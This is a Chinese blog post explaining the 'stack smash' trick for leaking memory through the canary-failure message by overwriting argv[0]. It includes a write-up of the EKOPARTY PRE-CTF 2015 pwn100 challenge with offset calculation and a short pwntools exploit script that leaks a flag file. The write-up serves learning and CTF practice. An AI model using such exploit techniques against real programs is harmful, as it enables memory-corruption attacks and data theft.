<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="Stack smash 在程序加了 canary 保护之后，如果我们读取的 buffer 覆盖了对应的值时，程序就会报错，而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后，如果发现 canary 被修改的话，程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所">
<meta name="keywords" content="二进制,栈溢出,Pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="花式栈溢出之Stack smash">
<meta property="og:url" content="https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/index.html">
<meta property="og:site_name" content="Mi1k7ea">
<meta property="og:description" content="Stack smash 在程序加了 canary 保护之后，如果我们读取的 buffer 覆盖了对应的值时，程序就会报错，而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后，如果发现 canary 被修改的话，程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/1.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/2.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/3.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/4.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/6.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/5.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/8.png">
<meta property="og:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/7.png">
<meta property="og:updated_time" content="2019-03-30T15:21:58.705Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="花式栈溢出之Stack smash">
<meta name="twitter:description" content="Stack smash 在程序加了 canary 保护之后，如果我们读取的 buffer 覆盖了对应的值时，程序就会报错，而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后，如果发现 canary 被修改的话，程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所">
<meta name="twitter:image" content="https://mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/1.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>花式栈溢出之Stack smash</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">H0m3</a></li>
         
          <li><a href="/categories/">C4teg0ri3s</a></li>
         
          <li><a href="/tags/">74gs</a></li>
         
          <li><a href="/about/">Ab0ut</a></li>
         
          <li><a href="https://blog.csdn.net/ski_12/">01d-b10g</a></li>
         
          <li><a href="/atom.xml">R55</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/03/24/C编写实现Linux反弹shell/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/03/22/图片XSS小结/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&text=花式栈溢出之Stack smash"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&is_video=false&description=花式栈溢出之Stack smash"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=花式栈溢出之Stack smash&body=Check out this article: https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&name=花式栈溢出之Stack smash&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Stack-smash"><span class="toc-number">1.</span> <span class="toc-text">Stack smash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EKOPARTY-PRE-CTF-2015-Smashing-the-stack-for-fun-and-profit"><span class="toc-number">2.</span> <span class="toc-text">EKOPARTY PRE-CTF 2015: Smashing the stack for fun and profit</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        花式栈溢出之Stack smash
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">Mi1k7ea</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-03-23T15:06:00.000Z" itemprop="datePublished">2019-03-23</time>
        
      
    </div>


      
    <div class="article-tag">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Pwn/">Pwn</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/Pwn/">Pwn</a>, <a class="tag-link" href="/tags/二进制/">二进制</a>, <a class="tag-link" href="/tags/栈溢出/">栈溢出</a>
    </div>
    <div class="article-tag">
        <i class="fas fa-eye"></i>
        阅读量：<span id="busuanzi_value_page_pv"></span>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="Stack-smash"><a href="#Stack-smash" class="headerlink" title="Stack smash"></a>Stack smash</h2><blockquote>
<p>在程序加了 canary 保护之后，如果我们读取的 buffer 覆盖了对应的值时，程序就会报错，而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后，如果发现 canary 被修改的话，程序就会执行 <code>__stack_chk_fail</code> 函数来打印 argv[0] 指针所指向的字符串，正常情况下，这个指针指向了程序名。其代码如下：</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> __attribute__ ((noreturn)) __stack_chk_fail (<span class="keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">  __fortify_fail (<span class="string">"stack smashing detected"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">void</span> __attribute__ ((noreturn)) internal_function __fortify_fail (<span class="keyword">const</span> <span class="keyword">char</span> *msg)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">/* The loop is added only to keep gcc happy.  */</span></span><br><span class="line">  <span class="keyword">while</span> (<span class="number">1</span>)</span><br><span class="line">    __libc_message (<span class="number">2</span>, <span class="string">"*** %s ***: %s terminated\n"</span>,</span><br><span class="line">                    msg, __libc_argv[<span class="number">0</span>] ?: <span class="string">"&lt;unknown&gt;"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>所以说如果我们利用栈溢出覆盖 argv[0] 为我们想要输出的字符串的地址，那么在 <code>__fortify_fail</code> 函数中就会输出我们想要的信息。</p>
</blockquote>
<h2 id="EKOPARTY-PRE-CTF-2015-Smashing-the-stack-for-fun-and-profit"><a href="#EKOPARTY-PRE-CTF-2015-Smashing-the-stack-for-fun-and-profit" class="headerlink" title="EKOPARTY PRE-CTF 2015: Smashing the stack for fun and profit"></a>EKOPARTY PRE-CTF 2015: Smashing the stack for fun and profit</h2><p>这里结合ekoparty-pre-ctf-2015的一道Pwn题来学习，<a href="https://github.com/ctfs/write-ups-2015/blob/master/ekoparty-pre-ctf-2015/pwn/smashing-the-stack-for-fun-and-profit/pwn100.zip" target="_blank" rel="noopener">题目下载地址</a>。</p>
<p>在本地运行前，需要在本地先建立一个flag.txt。</p>
<p>运行程序，先给个有趣的地址，然后给你输入用户名；file查看是静态链接文件；checksec发现开启了NX和Canary：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/1.png" alt=""></p>
<p>IDA看下main()函数，程序会打开本地的flag.txt文件，然后复制该文件描述符到一个buf中，接着输出一个指向该buf的地址并询问你的用户名，通过read()函数获取0x400长度的用户输入的内容，而0x400数值过大，由此可知read()函数存在栈溢出漏洞：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/2.png" alt=""></p>
<p>这样看应该是直接给了获取flag的地址了。</p>
<p>回到之前安全编译选项检测的结果发现，程序是开了Canary的，根据Canary的原理，其在一个函数入口处从fs段内获取一个随机值，一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置，如果攻击者利用栈溢出修改到了这个值，导致该值与存入的值不一致，__stack_chk_fail()函数将抛出异常并退出程序。</p>
<p>先试下发送大量字符，查看到抛出异常信息，即调用了Canary实现代码中的__libc_message()将__libc_argv[0]打印了出来，这里__libc_argv[0]为本程序名，同时发现程序只是终止了而非栈溢出时的段错误：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/3.png" alt=""></p>
<p>也就是说，只要溢出的内容覆盖了Canary插入的cookie，Canary就会报错，且当前输入200个字符还未达到覆盖到argv[0]的位置。整个栈结构及溢出原理如下图所示：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/4.png" alt=""></p>
<p>下面只需要确定溢出的变量地址距离argv[0]的偏移地址。</p>
<p><strong>Method1——使用pattern</strong></p>
<p>之前pattern_create生成的200个字符串并未使程序出现段错误，后面尝试到400个字符串时发生段错误，没有输出Canary出错返回的异常信息而是输出Segmentation fault，即输入字符溢出覆盖了argv[0]地址导致程序无法正常读取该值从而发生错误：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/6.png" alt=""></p>
<p>pattern_offset得到偏移量为376：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/5.png" alt=""></p>
<p><strong>Method2——断点调试</strong></p>
<p>先在main()函数打断点，运行：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/8.png" alt=""></p>
<p>可以看出0x7fffffffe2bd保存的是程序名，其自然就是 argv[0]，所以我们修改的内容就是这个地址。同时0x7fffffffdf48处保留着该地址，所以我们真正需要覆盖的地址是0x7fffffffdf48。</p>
<p>此时RBP的地址为0x7fffffffde60；在前面IDA中可以看到变量v8相对于RBP的偏移量为90h，因此可算出v8变量的地址为RBP-90h=0x7fffffffddd0。</p>
<p>最后可以算出v8变量到需要覆盖的地址的偏移量为：|0x7fffffffddd0 - 0x7fffffffdf48|=178h=376(d)</p>
<p>编写payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">"./xpl"</span>)</span><br><span class="line">addr = int(sh.recvline().split()[<span class="number">4</span>], <span class="number">16</span>)</span><br><span class="line"></span><br><span class="line">payload = flat([<span class="string">"A"</span> * <span class="number">376</span>, p64(addr)])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">result = sh.recvall()</span><br><span class="line"><span class="keyword">print</span> result</span><br></pre></td></tr></table></figure>
<p>运行getflag：</p>
<p><img src="/2019/03/23/花式栈溢出之Stack-smash/7.png" alt=""></p>

  </div>
</article>


<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<br><br>
<div id="vcomments"></div>
    <script>
        new Valine({
            av: AV,
            el: '#vcomments',
            appId: 'Jyl0XQwm2jIH31Tx16dygCNv-gzGzoHsz',
            appKey: 'Iqq1VTg9X5EfKJt3MMIj8MMB',
            placeholder: '大佬亲临寒站，可否指点一二',
        })
    </script>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">H0m3</a></li>
         
          <li><a href="/categories/">C4teg0ri3s</a></li>
         
          <li><a href="/tags/">74gs</a></li>
         
          <li><a href="/about/">Ab0ut</a></li>
         
          <li><a href="https://blog.csdn.net/ski_12/">01d-b10g</a></li>
         
          <li><a href="/atom.xml">R55</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Stack-smash"><span class="toc-number">1.</span> <span class="toc-text">Stack smash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EKOPARTY-PRE-CTF-2015-Smashing-the-stack-for-fun-and-profit"><span class="toc-number">2.</span> <span class="toc-text">EKOPARTY PRE-CTF 2015: Smashing the stack for fun and profit</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&text=花式栈溢出之Stack smash"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&is_video=false&description=花式栈溢出之Stack smash"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=花式栈溢出之Stack smash&body=Check out this article: https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&title=花式栈溢出之Stack smash"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://Mi1k7ea.github.com/2019/03/23/花式栈溢出之Stack-smash/&name=花式栈溢出之Stack smash&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="false"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="false"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="false"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="false"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 Mi1k7ea
  </div>
  <span id="busuanzi_container_site_pv"> 
    <i class="fas fa-eye"></i>
    过客：<span id="busuanzi_value_site_uv"></span>
  </span>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">H0m3</a></li>
         
          <li><a href="/categories/">C4teg0ri3s</a></li>
         
          <li><a href="/tags/">74gs</a></li>
         
          <li><a href="/about/">Ab0ut</a></li>
         
          <li><a href="https://blog.csdn.net/ski_12/">01d-b10g</a></li>
         
          <li><a href="/atom.xml">R55</a></li>
        
      </ul>
    </nav>
  </div>
</footer>
<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
